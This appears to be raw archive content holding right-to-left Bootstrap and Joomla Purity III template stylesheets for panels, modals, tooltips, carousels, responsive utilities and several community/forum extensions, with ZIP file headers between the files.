.panel-success > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #d6e9c6;
}
.panel-info {
  border-color: #bce8f1;
}
.panel-info > .panel-heading {
  color: #3a87ad;
  background-color: #d9edf7;
  border-color: #bce8f1;
}
.panel-info > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #bce8f1;
}
.panel-info > .panel-heading .badge {
  color: #d9edf7;
  background-color: #3a87ad;
}
.panel-info > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #bce8f1;
}
.panel-warning {
  border-color: #faebcc;
}
.panel-warning > .panel-heading {
  color: #c09853;
  background-color: #fcf8e3;
  border-color: #faebcc;
}
.panel-warning > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #faebcc;
}
.panel-warning > .panel-heading .badge {
  color: #fcf8e3;
  background-color: #c09853;
}
.panel-warning > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #faebcc;
}
.panel-danger {
  border-color: #ebccd1;
}
.panel-danger > .panel-heading {
  color: #b94a48;
  background-color: #f2dede;
  border-color: #ebccd1;
}
.panel-danger > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #ebccd1;
}
.panel-danger > .panel-heading .badge {
  color: #f2dede;
  background-color: #b94a48;
}
.panel-danger > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #ebccd1;
}
.well {
  min-height: 20px;
  padding: 19px;
  margin-bottom: 20px;
  background-color: #f5f5f5;
  border: 1px solid #e3e3e3;
  border-radius: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.05);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.05);
}
.well blockquote {
  border-color: #ddd;
  border-color: rgba(0, 0, 0, 0.15);
}
.well-lg {
  padding: 24px;
  border-radius: 0;
}
.well-sm {
  padding: 9px;
  border-radius: 0;
}
.close {
  float: left;
  font-size: 21px;
  font-weight: bold;
  line-height: 1;
  color: #000000;
  text-shadow: 0 1px 0 #ffffff;
  filter: alpha(opacity=20);
  opacity: 0.2;
}
.close:hover,
.close:focus {
  color: #000000;
  text-decoration: none;
  cursor: pointer;
  filter: alpha(opacity=50);
  opacity: 0.5;
}
button.close {
  padding: 0;
  cursor: pointer;
  background: transparent;
  border: 0;
  -webkit-appearance: none;
  appearance: none;
}

.modal-open {
  overflow: hidden;
}
.modal {
  position: fixed;
  top: 0;
  left: 0;
  bottom: 0;
  right: 0;
  z-index: 1050;
  display: none;
  overflow: hidden;
  -webkit-overflow-scrolling: touch;
  outline: 0;
}
.modal.fade .modal-dialog {
  -webkit-transform: translate(0, -25%);
  -ms-transform: translate(0, -25%);
  -o-transform: translate(0, -25%);
  transform: translate(0, -25%);
  -webkit-transition: -webkit-transform 0.3s ease-out;
  -moz-transition: -moz-transform 0.3s ease-out;
  -o-transition: -o-transform 0.3s ease-out;
  transition: transform 0.3s ease-out;
}
.modal.in .modal-dialog {
  -webkit-transform: translate(0, 0);
  -ms-transform: translate(0, 0);
  -o-transform: translate(0, 0);
  transform: translate(0, 0);
}
.modal-open .modal {
  overflow-x: hidden;
  overflow-y: auto;
}
.modal-dialog {
  position: relative;
  width: auto;
  margin: 10px;
}
.modal-content {
  position: relative;
  background-color: #ffffff;
  background-clip: padding-box;
  border: 1px solid #999999;
  border: 1px solid rgba(0, 0, 0, 0.2);
  border-radius: 0;
  -webkit-box-shadow: 0 3px 9px rgba(0, 0, 0, 0.5);
  box-shadow: 0 3px 9px rgba(0, 0, 0, 0.5);
  outline: 0;
}
.modal-backdrop {
  position: fixed;
  top: 0;
  left: 0;
  bottom: 0;
  right: 0;
  z-index: 1040;
  background-color: #000000;
}
.modal-backdrop.fade {
  filter: alpha(opacity=0);
  opacity: 0;
}
.modal-backdrop.in {
  filter: alpha(opacity=50);
  opacity: 0.5;
}
.modal-header {
  padding: 20px;
  border-bottom: 1px solid #e5e5e5;
}
.modal-header .close {
  margin-top: -2px;
}
.modal-title {
  margin: 0;
  line-height: 1.42857143;
}
.modal-body {
  position: relative;
  padding: 20px;
}
.modal-footer {
  padding: 20px;
  text-align: left;
  border-top: 1px solid #e5e5e5;
}
.modal-footer .btn + .btn {
  margin-bottom: 0;
  margin-right: 5px;
}
.modal-footer .btn-group .btn + .btn {
  margin-right: -1px;
}
.modal-footer .btn-block + .btn-block {
  margin-right: 0;
}
.modal-scrollbar-measure {
  position: absolute;
  top: -9999px;
  width: 50px;
  height: 50px;
  overflow: scroll;
}
@media (min-width: 768px) {
  .modal-dialog {
    width: 600px;
    margin: 30px auto;
  }
  .modal-content {
    -webkit-box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
    box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
  }
  .modal-sm {
    width: 300px;
  }
}
@media (min-width: 992px) {
  .modal-lg {
    width: 900px;
  }
}
.tooltip {
  position: absolute;
  z-index: 1030;
  display: block;
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-style: normal;
  font-weight: 400;
  line-height: 1.42857143;
  line-break: auto;
  text-align: right;
  text-align: start;
  text-decoration: none;
  text-shadow: none;
  text-transform: none;
  letter-spacing: normal;
  word-break: normal;
  word-spacing: normal;
  word-wrap: normal;
  white-space: normal;
  font-size: 12px;
  filter: alpha(opacity=0);
  opacity: 0;
}
.tooltip.in {
  filter: alpha(opacity=90);
  opacity: 0.9;
}
.tooltip.top {
  padding: 5px 0;
  margin-top: -3px;
}
.tooltip.right {
  padding: 0 5px;
  margin-right: 3px;
}
.tooltip.bottom {
  padding: 5px 0;
  margin-top: 3px;
}
.tooltip.left {
  padding: 0 5px;
  margin-right: -3px;
}
.tooltip.top .tooltip-arrow {
  bottom: 0;
  right: 50%;
  margin-right: -5px;
  border-width: 5px 5px 0;
  border-top-color: #000000;
}
.tooltip.top-left .tooltip-arrow {
  left: 5px;
  bottom: 0;
  margin-bottom: -5px;
  border-width: 5px 5px 0;
  border-top-color: #000000;
}
.tooltip.top-right .tooltip-arrow {
  bottom: 0;
  right: 5px;
  margin-bottom: -5px;
  border-width: 5px 5px 0;
  border-top-color: #000000;
}
.tooltip.right .tooltip-arrow {
  top: 50%;
  right: 0;
  margin-top: -5px;
  border-width: 5px 0 5px 5px;
  border-left-color: #000000;
}
.tooltip.left .tooltip-arrow {
  top: 50%;
  left: 0;
  margin-top: -5px;
  border-width: 5px 5px 5px 0;
  border-right-color: #000000;
}
.tooltip.bottom .tooltip-arrow {
  top: 0;
  right: 50%;
  margin-right: -5px;
  border-width: 0 5px 5px;
  border-bottom-color: #000000;
}
.tooltip.bottom-left .tooltip-arrow {
  top: 0;
  left: 5px;
  margin-top: -5px;
  border-width: 0 5px 5px;
  border-bottom-color: #000000;
}
.tooltip.bottom-right .tooltip-arrow {
  top: 0;
  right: 5px;
  margin-top: -5px;
  border-width: 0 5px 5px;
  border-bottom-color: #000000;
}
.tooltip-inner {
  max-width: 350px;
  padding: 3px 8px;
  color: #ffffff;
  text-align: center;
  background-color: #000000;
  border-radius: 0;
}
.tooltip-arrow {
  position: absolute;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
}
.popover {
  position: absolute;
  top: 0;
  right: 0;
  z-index: 1010;
  display: none;
  max-width: 276px;
  padding: 1px;
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-style: normal;
  font-weight: 400;
  line-height: 1.42857143;
  line-break: auto;
  text-align: right;
  text-align: start;
  text-decoration: none;
  text-shadow: none;
  text-transform: none;
  letter-spacing: normal;
  word-break: normal;
  word-spacing: normal;
  word-wrap: normal;
  white-space: normal;
  font-size: 14px;
  background-color: #ffffff;
  background-clip: padding-box;
  border: 1px solid #cccccc;
  border: 1px solid rgba(0, 0, 0, 0.2);
  border-radius: 0;
  -webkit-box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2);
  box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2);
}
.popover.top {
  margin-top: -10px;
}
.popover.right {
  margin-right: 10px;
}
.popover.bottom {
  margin-top: 10px;
}
.popover.left {
  margin-right: -10px;
}
.popover > .arrow {
  border-width: 11px;
}
.popover > .arrow,
.popover > .arrow:after {
  position: absolute;
  display: block;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
}
.popover > .arrow:after {
  content: "";
  border-width: 10px;
}
.popover.top > .arrow {
  bottom: -11px;
  right: 50%;
  margin-right: -11px;
  border-top-color: #999999;
  border-top-color: rgba(0, 0, 0, 0.25);
  border-bottom-width: 0;
}
.popover.top > .arrow:after {
  bottom: 1px;
  margin-right: -10px;
  content: " ";
  border-top-color: #ffffff;
  border-bottom-width: 0;
}
.popover.right > .arrow {
  top: 50%;
  right: -11px;
  margin-top: -11px;
  border-left-color: #999999;
  border-left-color: rgba(0, 0, 0, 0.25);
  border-right-width: 0;
}
.popover.right > .arrow:after {
  bottom: -10px;
  right: 1px;
  content: " ";
  border-left-color: #ffffff;
  border-right-width: 0;
}
.popover.bottom > .arrow {
  top: -11px;
  right: 50%;
  margin-right: -11px;
  border-top-width: 0;
  border-bottom-color: #999999;
  border-bottom-color: rgba(0, 0, 0, 0.25);
}
.popover.bottom > .arrow:after {
  top: 1px;
  margin-right: -10px;
  content: " ";
  border-top-width: 0;
  border-bottom-color: #ffffff;
}
.popover.left > .arrow {
  top: 50%;
  left: -11px;
  margin-top: -11px;
  border-left-width: 0;
  border-right-color: #999999;
  border-right-color: rgba(0, 0, 0, 0.25);
}
.popover.left > .arrow:after {
  left: 1px;
  bottom: -10px;
  content: " ";
  border-left-width: 0;
  border-right-color: #ffffff;
}
.popover-title {
  padding: 8px 14px;
  margin: 0;
  font-size: 14px;
  background-color: #f7f7f7;
  border-bottom: 1px solid #ebebeb;
  border-radius: -1 -1 0 0;
}
.popover-content {
  padding: 9px 14px;
}
.carousel {
  position: relative;
}
.carousel-inner {
  position: relative;
  width: 100%;
  overflow: hidden;
}
.carousel-inner > .item {
  position: relative;
  display: none;
  -webkit-transition: 0.6s ease-in-out right;
  -o-transition: 0.6s ease-in-out right;
  transition: 0.6s ease-in-out right;
}
.carousel-inner > .item > img,
.carousel-inner > .item > a > img {
  line-height: 1;
}
@media all and (transform-3d), (-webkit-transform-3d) {
  .carousel-inner > .item {
    -webkit-transition: -webkit-transform 0.6s ease-in-out;
    -moz-transition: -moz-transform 0.6s ease-in-out;
    -o-transition: -o-transform 0.6s ease-in-out;
    transition: transform 0.6s ease-in-out;
    -webkit-backface-visibility: hidden;
    -moz-backface-visibility: hidden;
    backface-visibility: hidden;
    -webkit-perspective: 1000px;
    -moz-perspective: 1000px;
    perspective: 1000px;
  }
  .carousel-inner > .item.next,
  .carousel-inner > .item.active.right {
    -webkit-transform: translate3d(100%, 0, 0);
    transform: translate3d(100%, 0, 0);
    right: 0;
  }
  .carousel-inner > .item.prev,
  .carousel-inner > .item.active.left {
    -webkit-transform: translate3d(-100%, 0, 0);
    transform: translate3d(-100%, 0, 0);
    right: 0;
  }
  .carousel-inner > .item.next.left,
  .carousel-inner > .item.prev.right,
  .carousel-inner > .item.active {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
    right: 0;
  }
}
.carousel-inner > .active,
.carousel-inner > .next,
.carousel-inner > .prev {
  display: block;
}
.carousel-inner > .active {
  right: 0;
}
.carousel-inner > .next,
.carousel-inner > .prev {
  position: absolute;
  top: 0;
  width: 100%;
}
.carousel-inner > .next {
  right: 100%;
}
.carousel-inner > .prev {
  right: -100%;
}
.carousel-inner > .next.left,
.carousel-inner > .prev.right {
  right: 0;
}
.carousel-inner > .active.left {
  right: -100%;
}
.carousel-inner > .active.right {
  right: 100%;
}
.carousel-control {
  position: absolute;
  top: 0;
  bottom: 0;
  right: 0;
  width: 15%;
  font-size: 20px;
  color: #ffffff;
  text-align: center;
  text-shadow: 0 1px 2px rgba(0, 0, 0, 0.6);
  background-color: rgba(0, 0, 0, 0);
  filter: alpha(opacity=50);
  opacity: 0.5;
}
.carousel-control.left {
  background-image: -webkit-linear-gradient(left, rgba(0, 0, 0, 0.5) 0%, rgba(0, 0, 0, 0.0001) 100%);
  background-image: -o-linear-gradient(left, rgba(0, 0, 0, 0.5) 0%, rgba(0, 0, 0, 0.0001) 100%);
  background-image: linear-gradient(to right, rgba(0, 0, 0, 0.5) 0%, rgba(0, 0, 0, 0.0001) 100%);
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#80000000', endColorstr='#00000000', GradientType=1);
  background-repeat: repeat-x;
}
.carousel-control.right {
  left: 0;
  right: auto;
  background-image: -webkit-linear-gradient(left, rgba(0, 0, 0, 0.0001) 0%, rgba(0, 0, 0, 0.5) 100%);
  background-image: -o-linear-gradient(left, rgba(0, 0, 0, 0.0001) 0%, rgba(0, 0, 0, 0.5) 100%);
  background-image: linear-gradient(to right, rgba(0, 0, 0, 0.0001) 0%, rgba(0, 0, 0, 0.5) 100%);
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#00000000', endColorstr='#80000000', GradientType=1);
  background-repeat: repeat-x;
}
.carousel-control:hover,
.carousel-control:focus {
  color: #ffffff;
  text-decoration: none;
  outline: 0;
  filter: alpha(opacity=90);
  opacity: 0.9;
}
.carousel-control .icon-prev,
.carousel-control .icon-next,
.carousel-control .glyphicon-chevron-left,
.carousel-control .glyphicon-chevron-right {
  position: absolute;
  top: 50%;
  z-index: 5;
  display: inline-block;
  margin-top: -10px;
}
.carousel-control .icon-prev,
.carousel-control .glyphicon-chevron-left {
  right: 50%;
  margin-right: -10px;
}
.carousel-control .icon-next,
.carousel-control .glyphicon-chevron-right {
  left: 50%;
  margin-left: -10px;
}
.carousel-control .icon-prev,
.carousel-control .icon-next {
  width: 20px;
  height: 20px;
  font-family: serif;
  line-height: 1;
}
.carousel-control .icon-prev:before {
  content: "\2039";
}
.carousel-control .icon-next:before {
  content: "\203a";
}
.carousel-indicators {
  position: absolute;
  bottom: 10px;
  right: 50%;
  z-index: 15;
  width: 60%;
  padding-right: 0;
  margin-right: -30%;
  text-align: center;
  list-style: none;
}
.carousel-indicators li {
  display: inline-block;
  width: 10px;
  height: 10px;
  margin: 1px;
  text-indent: -999px;
  cursor: pointer;
  background-color: #000 \9;
  background-color: rgba(0, 0, 0, 0);
  border: 1px solid #ffffff;
  border-radius: 10px;
}
.carousel-indicators .active {
  width: 12px;
  height: 12px;
  margin: 0;
  background-color: #ffffff;
}
.carousel-caption {
  position: absolute;
  left: 15%;
  bottom: 20px;
  right: 15%;
  z-index: 10;
  padding-top: 20px;
  padding-bottom: 20px;
  color: #ffffff;
  text-align: center;
  text-shadow: 0 1px 2px rgba(0, 0, 0, 0.6);
}
.carousel-caption .btn {
  text-shadow: none;
}
@media screen and (min-width: 768px) {
  .carousel-control .glyphicon-chevron-left,
  .carousel-control .glyphicon-chevron-right,
  .carousel-control .icon-prev,
  .carousel-control .icon-next {
    width: 30px;
    height: 30px;
    margin-top: -10px;
    font-size: 30px;
  }
  .carousel-control .glyphicon-chevron-left,
  .carousel-control .icon-prev {
    margin-right: -10px;
  }
  .carousel-control .glyphicon-chevron-right,
  .carousel-control .icon-next {
    margin-left: -10px;
  }
  .carousel-caption {
    left: 20%;
    right: 20%;
    padding-bottom: 30px;
  }
  .carousel-indicators {
    bottom: 20px;
  }
}

.clearfix:before,
.clearfix:after,
.container:before,
.container:after,
.container-fluid:before,
.container-fluid:after,
.row:before,
.row:after,
.form-horizontal .form-group:before,
.form-horizontal .form-group:after,
.btn-toolbar:before,
.btn-toolbar:after,
.btn-group-vertical > .btn-group:before,
.btn-group-vertical > .btn-group:after,
.nav:before,
.nav:after,
.navbar:before,
.navbar:after,
.navbar-header:before,
.navbar-header:after,
.navbar-collapse:before,
.navbar-collapse:after,
.pager:before,
.pager:after,
.panel-body:before,
.panel-body:after,
.modal-header:before,
.modal-header:after,
.modal-footer:before,
.modal-footer:after {
  display: table;
  content: " ";
}
.clearfix:after,
.container:after,
.container-fluid:after,
.row:after,
.form-horizontal .form-group:after,
.btn-toolbar:after,
.btn-group-vertical > .btn-group:after,
.nav:after,
.navbar:after,
.navbar-header:after,
.navbar-collapse:after,
.pager:after,
.panel-body:after,
.modal-header:after,
.modal-footer:after {
  clear: both;
}
.center-block {
  display: block;
  margin-left: auto;
  margin-right: auto;
}
.pull-right {
  float: left !important;
}
.pull-left {
  float: right !important;
}
.hide {
  display: none !important;
}
.show {
  display: block !important;
}
.invisible {
  visibility: hidden;
}
.text-hide {
  font: 0/0 a;
  color: transparent;
  text-shadow: none;
  background-color: transparent;
  border: 0;
}
.hidden {
  display: none !important;
}
.affix {
  position: fixed;
}
@-ms-viewport {
  width: device-width;
}
.visible-xs,
.visible-sm,
.visible-md,
.visible-lg {
  display: none !important;
}
.visible-xs-block,
.visible-xs-inline,
.visible-xs-inline-block,
.visible-sm-block,
.visible-sm-inline,
.visible-sm-inline-block,
.visible-md-block,
.visible-md-inline,
.visible-md-inline-block,
.visible-lg-block,
.visible-lg-inline,
.visible-lg-inline-block {
  display: none !important;
}
@media (max-width: 767px) {
  .visible-xs {
    display: block !important;
  }
  table.visible-xs {
    display: table !important;
  }
  tr.visible-xs {
    display: table-row !important;
  }
  th.visible-xs,
  td.visible-xs {
    display: table-cell !important;
  }
}
@media (max-width: 767px) {
  .visible-xs-block {
    display: block !important;
  }
}
@media (max-width: 767px) {
  .visible-xs-inline {
    display: inline !important;
  }
}
@media (max-width: 767px) {
  .visible-xs-inline-block {
    display: inline-block !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm {
    display: block !important;
  }
  table.visible-sm {
    display: table !important;
  }
  tr.visible-sm {
    display: table-row !important;
  }
  th.visible-sm,
  td.visible-sm {
    display: table-cell !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm-block {
    display: block !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm-inline {
    display: inline !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm-inline-block {
    display: inline-block !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md {
    display: block !important;
  }
  table.visible-md {
    display: table !important;
  }
  tr.visible-md {
    display: table-row !important;
  }
  th.visible-md,
  td.visible-md {
    display: table-cell !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md-block {
    display: block !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md-inline {
    display: inline !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md-inline-block {
    display: inline-block !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg {
    display: block !important;
  }
  table.visible-lg {
    display: table !important;
  }
  tr.visible-lg {
    display: table-row !important;
  }
  th.visible-lg,
  td.visible-lg {
    display: table-cell !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg-block {
    display: block !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg-inline {
    display: inline !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg-inline-block {
    display: inline-block !important;
  }
}
@media (max-width: 767px) {
  .hidden-xs {
    display: none !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .hidden-sm {
    display: none !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .hidden-md {
    display: none !important;
  }
}
@media (min-width: 1200px) {
  .hidden-lg {
    display: none !important;
  }
}
.visible-print {
  display: none !important;
}
@media print {
  .visible-print {
    display: block !important;
  }
  table.visible-print {
    display: table !important;
  }
  tr.visible-print {
    display: table-row !important;
  }
  th.visible-print,
  td.visible-print {
    display: table-cell !important;
  }
}
.visible-print-block {
  display: none !important;
}
@media print {
  .visible-print-block {
    display: block !important;
  }
}
.visible-print-inline {
  display: none !important;
}
@media print {
  .visible-print-inline {
    display: inline !important;
  }
}
.visible-print-inline-block {
  display: none !important;
}
@media print {
  .visible-print-inline-block {
    display: inline-block !important;
  }
}
@media print {
  .hidden-print {
    display: none !important;
  }
}PKӜ�\��/rr4purity_iii/css/rtl/orange/extras/layout_glossary.cssnu&1i�.glossary-nav {
  position: relative;
  z-index: 10;
  margin-bottom: 40px;
}
.glossary-nav nav {
  padding: 0;
}
.glossary-nav nav.affix {
  top: auto;
  position: relative;
}
.glossary-nav nav .nav-pills {
  background: #fff;
}
.glossary-nav nav .nav-pills > li {
  display: block;
  float: right;
  margin: 0 0 10px 1px;
}
.glossary-nav nav .nav-pills > li > a {
  background: #444444;
  color: #eeeeee;
  font-size: 18px;
  font-weight: 600;
  line-height: normal;
  padding: 0;
  width: 50px;
  height: 50px;
  line-height: 50px;
  text-align: center;
  text-transform: uppercase;
}
.glossary-nav nav .nav-pills > li > a:hover,
.glossary-nav nav .nav-pills > li > a:active,
.glossary-nav nav .nav-pills > li > a:focus {
  background: #ff8800;
  color: #fff;
}
@media screen and (min-width: 991px) {
  .glossary-nav nav.affix {
    top: 57px;
    position: fixed;
  }
  .glossary-nav nav .nav-pills > li > a {
    font-size: 24px;
  }
}
.glossary-group {
  margin-bottom: 40px;
  position: relative;
}
.glossary-group a[name] {
  position: absolute;
  top: -120px;
}
.glossary-group-title {
  background: #f7f7f7;
  color: #222222;
  font-weight: 600;
  font-size: 35px;
  margin: 0 0 20px;
  padding: 15px;
  text-transform: uppercase;
}
.glossary-group-items ul {
  padding: 0;
  margin: 0;
}
.glossary-group-items ul > li {
  list-style: none;
  padding: 0;
}
.glossary-group-items ul > li > a {
  color: #444444;
  display: block;
  font-size: 18px;
  padding: 5px 15px;
}
.glossary-group-items ul > li > a:hover,
.glossary-group-items ul > li > a:active,
.glossary-group-items ul > li > a:focus {
  color: #ff8800;
  text-decoration: none;
}PKӜ�\�S�??2purity_iii/css/rtl/orange/extras/com_community.cssnu&1i�.com_community #community-wrap label input,
.com_community #community-wrap .form-field input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .row-fluid.hero-area {
  margin: 0;
}
.com_community #community-wrap .cGuest .row-fluid.hero-area {
  margin-right: 0;
  margin-left: 0;
}
.com_community #community-wrap .js_dropDownMaster dt,
.com_community #community-wrap .js_dropDownParent li > a {
  height: 28px;
}
.com_community #community-wrap .joms-select {
  box-shadow: none;
}
.com_community #community-wrap .js-toolbar .navbar-inner {
  min-height: 40px;
}
.com_community #community-wrap .js-toolbar .nav-collapse {
  display: block;
}
.com_community #community-wrap .js-toolbar .nav > li > a {
  height: 38px;
  line-height: 25px;
}
.com_community #community-wrap .js-toolbar .dropdown-menu > li {
  border: 0;
}
.com_community #community-wrap .cStream-Content .row-fluid {
  margin-right: 0;
  margin-left: 0;
}
.com_community #community-wrap .joms-postbox-input .inputbox {
  box-shadow: none;
}
.com_community #community-wrap .joms-postbox-input .input-status {
  box-shadow: none;
  padding: 10px;
  overflow-y: auto;
  min-height: 160px !important;
}
.com_community #community-wrap .joms-postbox-input {
  overflow-y: scroll !important;
}
.com_community #community-wrap .joms-postbox-event .joms-postbox-dropdown .picker__select--month,
.com_community #community-wrap .joms-postbox-event .joms-postbox-dropdown .picker__select--year {
  display: inline-block;
}
.com_community #community-wrap .cProfile-Preferences .js_dropDownMaster dt,
.com_community #community-wrap .cProfile-Preferences .js_dropDownParent li > a {
  height: 26px;
  line-height: 20px;
}
.com_community #community-wrap .cProfile-Preferences label input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .cSearch .label-checkbox input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .advance-search label input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .cGroups-Create label input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .joms-page .joms-form__group select,
.com_community #community-wrap .joms-page .joms-form__group textarea,
.com_community #community-wrap .joms-page .joms-form__group input[type="text"],
.com_community #community-wrap .joms-page .joms-form__group input[type="password"],
.com_community #community-wrap .joms-page .joms-form__group input[type="datetime"],
.com_community #community-wrap .joms-page .joms-form__group input[type="datetime-local"],
.com_community #community-wrap .joms-page .joms-form__group input[type="date"],
.com_community #community-wrap .joms-page .joms-form__group input[type="month"],
.com_community #community-wrap .joms-page .joms-form__group input[type="time"],
.com_community #community-wrap .joms-page .joms-form__group input[type="week"],
.com_community #community-wrap .joms-page .joms-form__group input[type="number"],
.com_community #community-wrap .joms-page .joms-form__group input[type="email"],
.com_community #community-wrap .joms-page .joms-form__group input[type="url"],
.com_community #community-wrap .joms-page .joms-form__group input[type="search"],
.com_community #community-wrap .joms-page .joms-form__group input[type="tel"],
.com_community #community-wrap .joms-page .joms-form__group input[type="color"],
.com_community #community-wrap .joms-page .joms-form__group .inputbox {
  display: inline-block;
}
.com_community #community-wrap .joms-page .joms-form__group .joms-button--privacy {
  margin-left: 15px;
}
.com_community #community-wrap .joms-page .joms-form__group .joms-checkbox input {
  margin-top: 8px;
}
.com_community #community-wrap .jomsocial .joms-body .joms-focus__header__actions--desktop a {
  font-size: 2.5rem;
}
.com_community #community-wrap .jomsocial .joms-body .joms-focus__header__actions--desktop .joms-icon {
  width: 24px;
  height: 24px;
}
.com_community #community-wrap .jomsocial .joms-body a.joms-button--viewed.nolink span {
  margin: 0;
  padding-right: 15px;
}
.picker {
  background: green !important;
}
.picker .picker__box .picker__header {
  display: flex;
}
.picker .picker__box .picker__header .picker__select--month {
  margin-right: 20px;
}PKӜ�\k�O���3purity_iii/css/rtl/orange/extras/com_easysocial.cssnu&1i�.com_easysocial .es-toolbar .es-navbar-search .search-query::-moz-placeholder {
  color: #ffffff;
}
.com_easysocial .stream-meta {
  margin-right: 0;
  margin-left: 0;
}
.com_easysocial .stream-meta .stream-title .row-fluid {
  margin-right: 0;
  margin-left: 0;
}
.com_easysocial .stream-meta .stream-content .row-fluid {
  margin-right: 0;
  margin-left: 0;
}
.com_easysocial .es-stream-meta .es-stream-title .row-fluid {
  margin-right: 0;
  margin-left: 0;
}
.com_easysocial .dropdown-menu > li {
  border: 0;
}
.com_easysocial #es .app-news .checkbox input[type="checkbox"] {
  position: relative;
  margin-right: 0;
}
#es .o-nav--block {
  white-space: normal;
}
.es {
  clear: both;
}PKӜ�\�?���4purity_iii/css/rtl/orange/extras/com_easydiscuss.cssnu&1i�#discuss-wrapper .nav-collapse.collapse {
  display: block;
}
#discuss-wrapper .nav-collapse.collapse .modal-body .row-fluid {
  margin-right: 0;
  margin-left: 0;
}PKӜ�\tJ%��o�o/purity_iii/css/rtl/orange/extras/com_kunena.cssnu&1i�#kunena.layout .btn-group .dropdown-menu {
  background: #ffffff;
  border-color: #d5d5d5;
}
#kunena.layout .btn-group .dropdown-menu li {
  border-top: 1px solid #d5d5d5;
}
#kunena.layout .btn-group .dropdown-menu li a {
  color: #444444;
}
#kunena.layout .btn-group .dropdown-menu li a:hover {
  background-color: #eeeeee;
}
#kunena.layout .btn-group .dropdown-menu li:empty {
  display: none;
}
#kunena.layout input[type="checkbox"] {
  height: auto;
}
#kunena.layout .navbar {
  background: transparent;
  border: 0;
  border-bottom: 3px solid #ff8800;
  border-radius: 0;
  min-height: 0;
}
#kunena.layout .navbar .nav {
  margin-bottom: 0;
  width: auto;
}
#kunena.layout .navbar .nav > li {
  margin-left: 3px;
  margin-right: 0;
}
#kunena.layout .navbar .nav > li > a {
  background-color: #444444;
  border-radius: 2px 2px 0 0;
  color: #ffffff;
  font-weight: 400;
  line-height: 1.42857143;
  padding: 5px 10px;
  text-transform: none;
}
#kunena.layout .navbar .nav > li > a:hover,
#kunena.layout .navbar .nav > li > a:focus,
#kunena.layout .navbar .nav > li > a:active {
  background-color: #222222;
  box-shadow: none;
}
#kunena.layout .navbar .nav > li.active a {
  background-color: #ff8800;
  box-shadow: none;
}
@media (max-width: 1199px) {
  #kunena.layout .navbar .navbar-nav.pull-left > div {
    padding-top: 10px;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .btn {
    background: #ff8800;
    color: #ffffff;
    text-align: center;
    text-decoration: none;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse {
    background: #ffffff;
    display: none;
    padding: 0;
    position: absolute;
    width: 100%;
    z-index: 10;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse.in {
    display: block;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav {
    border: 1px solid #eeeeee;
    display: block;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li {
    background: #ffffff;
    border: 0;
    margin-left: 0;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a {
    background: #ffffff;
    color: #444444;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a:hover,
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a:focus,
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a:active {
    color: #ff8800;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li.active a {
    color: #ff8800;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li + li {
    border-top: 1px solid #eeeeee;
  }
}
#kunena.layout .navbar .mobile-user {
  border-radius: 0;
  color: #444444;
  margin-left: 0;
  margin-top: 0 !important;
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-toggle {
  background-color: transparent;
  border-radius: 0;
  color: #444444;
  padding: 5px 10px;
  line-height: 20px;
}
#kunena.layout .navbar .mobile-user .dropdown-toggle:hover,
#kunena.layout .navbar .mobile-user .dropdown-toggle:focus,
#kunena.layout .navbar .mobile-user .dropdown-toggle:active {
  background-color: transparent;
}
#kunena.layout .navbar .mobile-user .dropdown-toggle img {
  box-shadow: none;
  height: 17px;
  width: 17px;
}
